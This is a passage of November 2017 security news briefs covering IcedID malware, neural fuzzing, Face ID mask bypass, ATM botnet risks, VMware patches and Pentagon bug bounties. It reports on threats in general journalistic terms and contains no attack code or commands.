IcedID implements the ability to propagate over a network, a circumstance that suggests authors developed it to target large businesses.

“IcedID can propagate over a network. It monitors the victim’s online activity by setting up a local proxy for traffic tunneling, which is a concept reminiscent of the GootKit Trojan. Its attack tactics include both webinjection attacks and sophisticated redirection attacks similar to the scheme used by Dridex and TrickBot.” reads the analysis published by IBM.

The redirection scheme implemented by IcedID is designed to appear as seamless as possible to the victim. It includes displaying the legitimate bank’s URL in the address bar and the bank’s correct SSL certificate by keeping a live connection with the actual bank’s site.

The malware listens for the target URL and when it encounters a trigger, executes a Web injection. Victims are redirected to fake banking websites, used by crooks to trick victims into submitting their credentials.

IcedID

The attacker controls the victim’s session and uses social engineering to trick victims into sharing transaction authorization data.

The level of sophistication of the IcedID malware suggests the attackers belong to a well-structured group. The analysis of comments in IcedID code indicates the attackers are from Russian-speaking regions.

Experts believe the threat could evolve in the next future, for example by implementing advanced anti-virtual machine or anti-research techniques along with techniques to evade sandboxes.

Further technical details on the malware, including the Indicators of Compromise, are available in the blog post published by IBM.


Microsoft Uses Neural Networks to Improve Fuzzing
14.11.2017 securityweek IT
A team of Microsoft researchers has been working on improving fuzzing techniques by using deep neural networks, and initial tests have shown promising results.

Fuzzing is used to find software vulnerabilities – particularly memory corruption bugs – by injecting malformed or semi-malformed data into the targeted application. If the software crashes or behaves unexpectedly, it could indicate the presence of a security flaw.

There are three types of fuzzing: whitebox fuzzing, which tests source or disassembled code; blackbox fuzzing, which does not require access to source code; and greybox fuzzing, which is similar to blackbox fuzzing but uses results from previous executions for feedback.

Experts at Microsoft have attempted to improve this feedback loop using a type of machine learning called deep neural networks (DNN). Neural networks, a set of algorithms modeled after the human brain, are designed to recognize patterns in an effort to help classify and cluster data.

Neural networks have been used by several companies for security-related purposes, including for detecting spam and malware, and even in Apple’s new Face ID feature.

Microsoft researchers have been trying to use neural networks for a learning technique that relies on patterns in previous fuzzing iterations to guide future iterations.

“The neural models learn a function to predict good (and bad) locations in input files to perform fuzzing mutations based on the past mutations and corresponding code coverage information,” the researchers said.

The method has been implemented in American Fuzzy Lop (AFL), a popular open source fuzzer developed by Google researcher Michal Zalewski. Tests were conducted against parsers for the ELF, PDF, PNG and XML file formats.

The tests showed significant improvements in the results obtained with the neural AFL compared to the original AFL, except for PDF files, which experts believe may be too large. Improvements were seen in terms of code coverage, unique code paths and crashes.

The team behind the project believes this approach can be applied to any fuzzer, not just AFL.

“We believe our neural fuzzing research project is just scratching the surface of what can be achieved using deep neural networks for fuzzing,” explained Microsoft’s William Blum. “Right now, our model only learns fuzzing locations, but we could also use it to learn other fuzzing parameters such as the type of mutation or strategy to apply. We are also considering online versions of our machine learning model, in which the fuzzer constantly learns from ongoing fuzzing iterations.”

Blum is the lead of the engineering team for Microsoft Security Risk Detection, a recently launched cloud-based fuzzing service that uses artificial intelligence to find bugs and vulnerabilities in applications. The results of the research into the use of neural networks for fuzzing could help improve this service.

Another recently launched Microsoft tool designed for finding memory corruption bugs, VulnScan, might also be added to the Security Risk Detection service.


Financial Services Has Most Code Vulnerabilities of All Industries: Analysis
14.11.2017 securityweek Vulnerebility
Last week, the Securities Industry and Financial Markets Association (SIFMA) ran Quantum Dawn IV to test the resiliency and response of the financial services industry to a major cyber incident. Today, a new CAST report on application security health (CRASH) highlights that finance has some of the worst code -- in security terms -- of all the major industry sectors.

The details come from the CAST Software CRASH Report on Application Security (PDF). CAST analyzed 278 million lines of code from 1,388 applications and found 1.3 million CWE (MITRE's Common Weakness Enumeration) weaknesses in code developed under .NET and Java EE. The implication is that the banking sector will need to take considerable care in the implementation of Europe's open banking regulation (PSD2) due to come into force in January 2018. It will need to ensure that third-parties do not implement insecure code with access to banking code that already has a higher than average density of its own coding flaws.

CAST specifically analyzed code developed across ten different industry sectors within .NET and Java EE environments. It found a significantly different density of CWEs between the two environments, with .NET code generally having a greater density of weaknesses than Java EE -- in some cases with more than 35 CWE weaknesses per KLOC (1000 lines of code). A CWE is a coding weakness that could potentially be exploited by an attacker -- such as a buffer overflow flaw, or a SQLi or cross-site scripting flaw.

Financial services, Telecom and IT Consulting had the highest mean CWE densities. Energy and Utilities had the lowest CWE densities.

CAST also noted a difference between Waterfall coding and Agile coding -- with agile coding tending to introduce fewer weaknesses.

CAST's chief scientist, Bill Curtis, told SecurityWeek that while the Waterfall approach of defining and designing the entire project upfront is theoretically a good idea, business pressures -- with senior management requiring amendments in progress -- often make its actual implementation less than perfect. This in turn leads to additional work requirements and rushed deadlines introducing additional weaknesses.

In general, there are fewer CWE weaknesses found in Java EE developments that use an agile approach to development; that is, building the project while still in development, adding new features as required by senior management, and releasing new versions as soon as they are ready. This can be taken too far -- a high number releases (more than 6 per year) tends to introduce a higher number of weaknesses. This could be indicative of business seeking new features and rapid releases above secure coding. Security neds to be built into the process rather than added on to the application.

Nevertheless, there is still a surprisingly high density of weaknesses found in all applications across all industry sectors. Curtis would personally recommend a hybrid approach: using a waterfall approach to get the architecture right from the beginning, but an agile approach to delivering code.

He sees the real problem as a lack of discipline in coding that is itself the result of a lack of adequately qualified programmers. The rush to digitizing all aspects of business has placed a severe strain on the available supply of programmers -- schools and colleges simply cannot produce new programmers as fast as necessary. Furthermore, the coders that are provided tend not to have any formal training in 'secure coding'.

The under-supply of programmers has led to the development of the off-shore programming industry -- and especially from India. CAST's analysis shows no real difference in the number of CWEs between on-shore and off-shore coding. However, Curtis told SecurityWeek that the continuing growth of demand has already absorbed the top layer of programmers from the off-shore industry, and less able programmers are beginning to be employed.

He does not, however, believe that the growth in demand will inevitably lead to increasing security weaknesses in the code. Companies will always need to select the best programmers they can find to employ, but now need to provide additional in-house training for secure coding. This approach coupled with automated static code analysis would improve the quality of new applications -- and help strengthen the security of existing applications.

In the meantime, he believes that school education needs to change. At the moment it concentrates on teaching youngsters reading, writing and arithmetic. He believes that basic coding should be given similar emphasis to reading and writing. In the future, schools may need to discuss elegant routines in the same way as they currently discuss Shakespearean metaphors.


ThreatQuotient Raises $30 Million in Series C Funding
14.11.2017 securityweek IT
Threat intelligence platform provider ThreatQuotient announced on Monday that it has raised $30 million in Series C funding, bringing the total amount raised by the company to $54 million to date.

Founded in 2013 by Wayne Chiang and Ryan Trost, who previously worked at a Security Operations Center of defense contractor General Dynamics, ThreatQuotient offers a threat intelligence platform that helps customers manage and correlate external sources with all internal analytics solutions for contextual, operationalized intelligence.

According to the Reston, Virginia-based company, the funding will be used to fuel product development and support sales and marketing efforts for global expansion.

The company’s ThreatQ platform allows security analysts to leverage a threat library, an adaptive workbench, and an open API exchange to provide threat intelligence that is timely, accurate and relevant to their business.

ThreatQuotient claims that its platform eliminates the need for a security analyst to go through an entire pool of data to identify a threat by automating the process and suggesting sources of data that are more relevant to a given client.

“Our industry is at a crossroads and organizations must shift beyond simple detection and response to a position of understanding and anticipating threats through intelligence-driven security,” said John Czupak, President and CEO of ThreatQuotient.

The Series C round was led by Adams Street Partners, while strategic partners Cisco Investments and NTT DOCOMO Ventures joined existing investor New Enterprise Associates (NEA), and growth capital partner Silicon Valley Bank in the financing.

Fred Wang, a partner of the Venture/Growth Team at Adams Street Partners, will join ThreatQuotient's board of directors.


iPhone X's Face ID Bypassed by a Mask
13.11.2017 securityweek Apple
Face ID, the facial biometric unlocking technology included in Apple’s recently laucnhed iPhone X, can be bypassed using a mask, security researchers have discovered.

When revealing the new iPhone X in early September, Apple said that Face ID could recognize its owner with only 1 in 1,000,000 false positives, day or night, and that professional mask makers and makeup artists in Hollywood helped training the artificial intelligence behind the feature to protect from attempts to bypass it.

The feature, however, raised concerns over the use of facial recognition becoming the norm and opening the door to new ways to abuse it. Some even feared that it would result in advertisers and law enforcement being able to track people’s whereabouts much easier.

Simultaneously, many questioned Face ID’s effectiveness against keeping intruders out of the device. And while some previous attempts to trick the security feature appear to have failed, Face ID was successfully bypassed by a mask created by Bkav, a company focused on the network security, software, smartphone manufacturing and smarthome.

“One week after iPhone X officially went on sale, Bkav security experts from Vietnam show that Face ID can be fooled by mask, which means it is not an effective security measure,” the company says.

The mask used by the researchers in their experiment included 3D-printed elements, a nose made by a handmade artist, and 2D printed-elements for some parts. Hand-made skin was also used to trick Apple’s AI. The total cost to produce the mask was $150, the researchers say.

“The mask is crafted by combining 3D printing with makeup and 2D images, besides some special processing on the cheeks and around the face, where there are large skin areas, to fool AI of Face ID,” Ngo Tuan Anh, Bkav's Vice President of Cyber Security, said.

The security researchers claim that the purpose of their experiment was to show that facial recognition isn’t mature enough to be used in widely available devices even after 10 years of development. In 2008, Bkav demonstrated that face recognition was not an effective security measure for laptops, after manufacturers started using the technology in their products.

Although they say it’s actually easy to create a mask and beat Face ID, the researchers admit that their knowledge of how Apple’s AI works and what they could do to bypass it helped them in creating a proof of concept. The researchers claim that Apple appears to rely on the Face ID’s AI too much for the recognition process, which allows one to unlock the device even with half of their face covered.

“Potential targets shall not be regular users, but billionaires, leaders of major corporations, nation leaders and agents like FBI need to understand the Face ID's issue. Security units' competitors, commercial rivals of corporations, and even nations might benefit from our PoC,” Bkav says.

The researchers note that the mask was an experiment meant to prove a point, and that it was a successful experiment. They also revealed that they started working on the mask as soon as they received their iPhone X device on November 5 and that they plan on publishing full details related to how they built the mask.

“As for biometric security, fingerprint is the best,” the company concludes.

Until full details on the experiment are published, some questions remain unanswered, such as whether they used the dimensions of a real person’s face when creating the mask or if the attack was attempted with a fresh unlock.

Further details on how the experiment was set up are also required, such as whether the device was trained with the mask or not, and the number of attempts they used until successfully unlocking the phone.

SecurityWeek reached to Apple for a comment on Bkav’s findings, but the company redirected us to their Knowledge Base article on Face ID, where the additional security measures are detailed. There, Apple explains that setting up Face ID requires a passcode and that the passcode is requested after five unsuccessful attempts to match a face or if the device hasn’t been unlocked for more than 48 hours.

The passcode is also requested if it “hasn’t been used to unlock the device in the last six and a half days and Face ID hasn't unlocked the device in the last 4 hours,” Apple says.


Google to Ban Android Apps Misusing Accessibility Service
13.11.2017 securityweek Android
Following an increase in Android malware and adware that abuse accessibility services, Google has decided to take action against all apps that misuse the feature.

Much of the adware and malware that makes it onto the Google Play store abuses the BIND_ACCESSIBILITY_SERVICE permission. The permission is designed to allow apps to assist users with disabilities, but malware developers have found ways to misuse it in order to obtain device administrator privileges and conduct other malicious activities without raising suspicion.

One example is TOASTAMIGO, a piece of malware that exploits a recently patched vulnerability affecting the Toast feature in Android.

In an effort to prevent abuse, Google has decided that accessibility services should only be used to help people with disabilities. The tech giant has started contacting developers whose applications use the BIND_ACCESSIBILITY_SERVICE permission and informed them of the steps they need to take.

Developers who use the aforementioned permission to help people with disabilities must clearly state this in the app’s description on Google Play, and they must describe the functionality provided by the Accessibility Service permission. All other developers will have to remove the permission from their products within 30 days or risk having it pulled from the official app store.

“Alternatively, you can choose to unpublish the app,” Google told developers. “All violations are tracked. Serious or repeated violations of any nature will result in the termination of your developer account, and investigation and possible termination of related Google accounts.”

Many users and developers have raised concerns regarding Google’s decision, pointing out that legitimate apps often use the Accessibility Service as a workaround for features that otherwise might be difficult or impossible to implement.

Popular applications such as the LastPass password manager are set to lose important functionality if Google moves forward with its decision. There is also a lot of concern regarding the automation app Tasker, which is not specifically designed for individuals with disabilities, but which appears to be of great aid to some people with Parkinson's disease and Asperger syndrome.

Some have offered advice on how app developers may be able to bypass the new restrictions, and shared thoughts on what alternative routes Google could take to prevent abuse while allowing legitimate apps to continue using the service.


Creating ATM Botnets Not Difficult, Researchers Say
13.11.2017 securityweek BotNet
ATMs Are Not Immune to Supply Chain Attacks and Other Digital Threats

Internet-connected Automated teller machines (ATMs) can be discovered using dedicated search engines and specific keywords and then ensnared into botnets, Kaspersky Lab researchers believe.

With large sums of cash being loaded into ATMs on a daily basis, it’s no wonder that these devices are targeted by cybercriminals. And while some crooks take a blunt approach to getting into an ATM, using physical force, others prefer targeting the software running on the machine to make it spill out the cash, Kaspersky’s Olga Kochetova and Alexey Osipov explained at the DefCamp 2017 security conference in Bucharest last week.

There's no denying that ATMs run vulnerable software, they say. Many of the machines run the outdated, already retired Windows XP, meaning they are vulnerable by default, while others might have some unnecessary but flawed applications running on them, such as TeamViewer or an older, flawed variant of Adobe Acrobat Reader.

What’s more, banks often do not keep their ATMs updated, which also makes them vulnerable to malware and other types of attacks, the researchers say. The security inside the ATM is usually poor and the parts of the chain protecting the cash aren’t secured separately, meaning that the entire chain ca be compromised when a single part is exploited.

Accessing the software running on an ATM provides malicious actors with control over the cash cassettes inside the machine, thus allowing them to extract the cash. However, access to a single machine could also provide the actor with the ability to compromise the bank’s entire network of ATMs, Kaspersky’s researchers say.

There are multiple ways in which an attacker could achieve this, Kochetova and Osipov told SecurityWeek during a private talk at the DefCamp conference: by physically accessing an ATM to install a device in it, by compromising the computers that oversee the bank’s ATMs, and even by a supply-chain attack that focuses on the firmware that vendors or maintenance teams install on the machines.

“With access to an ATM, an actor could install a device in one ATM to send commands to all machines in the network. These commands would look like they come from the central command center. The actor can then use blank cards, or any cards, and withdraw cash from any ATM in the network,” the researchers explained.

This is possible because all of a bank’s ATMs are typically connected to a flat network, which means that every machine in the network could see all other connected machines. Thus, if the attacker’s device is implanted in an ATM directly connected to the network cable, it could allow an attacker to remotely control the machines. It is a classic example of man-in-the-middle attack (MitM), the researchers say.

They also pointed out that all evidence would disappear once the malicious device has been extracted from the ATM. Although a possibility, no such botnet has been observed to date. What has been seen, however, was a bank’s network being infected with an information stealer.

“This can be seen as a kind of an ATM botnet, since all machines were infected and the actor was remotely collecting data from them,” Kochetova said. “It is also possible that some crooks somewhere in the world are preparing an attack with money-withdrawal malware instead of sniffers,” she continued.

Attackers could also get the VPN drive out of the ATM and connect to the bank’s network through it without anyone noticing, Osipov explains. Such VPN devices are designed to work regardless of the host machine, so the attacker could use it with their own computer.

One other effective method of infiltrating ATM networks is to discover the machines that are online using specialized search engines such as Shodan, the researchers say. Although banks usually claim that no ATM is online, these devices can be easily found if the right keywords or phrases are used to perform the search, Kochetova and Osipov explained.

While the attack vector has been used before (specialized search engines can be used to discover vulnerable Internet of Things (IoT) devices, unsecured databases, and other types of Internet-facing devices), it is relatively new when it comes to finding ATMs.

Once they have discovered the online ATMs, the malicious actor can start checking for open ports and then attempt to compromise machines using known exploits. Thus, attackers could install information-stealing malware on the ATMs or ensnare them into botnets.

Infecting workstations inside the bank and then expanding the footprint to the entire network, including ATMs, is another compromise technique that attackers (such as the Cobalt hacking group) are using.

Recent attacks such as CCleaner and NotPetya have demonstrated the impact supply-chain attacks could have on a global scale, and Kaspersky’s researchers say that ATMs aren’t safe from this type of assaults either. To be successful, the attacker would target the “golden image” used to install the operating system and all running software on an ATM.

“We already observed incidents where ordinary malware ended up on an ATM through an infected USB drive that a technician connected to the machine. Thus, if an infected ‘golden image’ is used, the technician would never even notice the compromise. Of course, the attacker would have to know what specific software to install on that ‘golden image’ to compromise the ATMs without being noticed,” Osipov said.

“The same would happen if a service provider is used as a vector of attack. No one would notice the compromise,” he also said.

An ATM botnet could also be used to mine crypto-currency. Crypto miners have become highly popular over the past few years and an increasing number of malicious attacks focused on deploying such software was observed this year. Because they have computing power, ATMs can be used for mining too.

“In the end, every ATM is yet another type of computer. This means it can be hacked if the right vulnerabilities are discovered,” Kochetova pointed out. “It is the same as with CCTV cameras that are infected to create IoT botnets,” she concluded.


VMware Patches Vulnerabilities in vCenter Server
13.11.2017 securityweek Vulnerebility
The VMware vCenter Server management software is affected by a couple of moderate severity vulnerabilities that can be exploited for obtaining information and remote denial-of-service (DoS) attacks.

The first flaw, tracked as CVE-2017-4927, is related to how vCenter Server handles specially crafted LDAP network packets. An attacker can exploit the vulnerability remotely to cause a DoS condition.

The vulnerability was discovered by a Fortinet researcher in January, but it was only confirmed in April and patched some months later. Fortinet has published its own advisory for the security hole and assigned it a risk rating of 3/5.

The issue affects vCenter Server 6.0 and 6.5 on any platform and it has been addressed with the release of versions 6.0 U3c and 6.5 U1.

The second vulnerability, CVE-2017-4928, affects the Flash-based vSphere Web Client; VMware pointed out that the HTML5-based application is not affected.

This CVE identifier has actually been assigned to two weaknesses discovered by a Tencent researcher in the product: a server-side request forgery (SSRF) issue and a CRLF injection bug.

“An attacker may exploit these issues by sending a POST request with modified headers towards internal services leading to information disclosure,” VMware said in its advisory.

vCenter Server 5.5 and 6.0 are affected, and patches are included in versions 5.5 U3f and 6.0 U3c.

VMware’s disclosure of the vulnerabilities coincides with the release of vCenter Server 6.0 U3c. The other versions that include patches for these security holes, 5.5 U3f and 6.5 U1, were made available in mid-September and late July, respectively.

Version 6.5 U1 also patched a moderate severity stored cross-site scripting (XSS) vulnerability in the vCenter Server H5 Client. The flaw can be exploited by an authenticated attacker to execute malicious JavaScript code in the targeted user’s context.

vCenter Server versions 5.5, 6.0 and 6.5 are also affected by a bug that allows an attacker with limited user privileges to abuse an API in order to access the guest operating system without authentication. The flaw was disclosed in late July at the Black Hat security conference in Las Vegas, but VMware has only released workarounds for it.


Bug bounty programs and a vulnerability disclosure policy allowed Pentagon fix thousands of flaws
13.11.2017 securityaffairs BigBrothers

Bug bounty programs allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.
Bug bounty program ‘Hack the Pentagon’ launched by the Pentagon in 2016 along with the vulnerability disclosure policy announced nearly one year ago allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.

“Great news for U.S. citizens! Over 3,000 valid security vulnerabilities have been resolved with the U.S. Department of Defense’s “Hack the Pentagon” hacker-powered security program.” reported the platform used by the US Government to manage the initiatives.

“Just over a year ago, following the success of the pilot, we announced the U.S. Department of Defense was expanding its “Hack the Pentagon,” initiatives. To date, HackerOne and DoD have run bug bounty challenges for Hack the Pentagon, Hack the Army and Hack the Air Force.

The success of the bug bounty programs launched by the UG Government has been undeniable.

The hackers have earned over $300,000 in bounties for their contributions, they reported nearly 500 vulnerabilities in nearly 40 DoD components, more than 100 of the flaws have been rated critical or high severity.

Let me also remind you that the DoD vulnerability disclosure program does not offer any monetary rewards, instead it allows hackers to report security holes without the fear of potential legal consequences.

The list of vulnerabilities includes remote code execution, SQL injection, and authentication bypass issues.

Bug bounty Hack the Pentagon

The majority of the reports were submitted by US researchers, followed by white hat hackers in India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

Going through the various bug bounty initiatives launched by the US Government, we can notice that the Hack the Pentagon received 138 valid submissions and paid out roughly $75,000, the Hack the Army paid out approximately $100,000 for 118 valid reports, and Hack the Air Force, which paid out $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs were announced by U.S. authorities.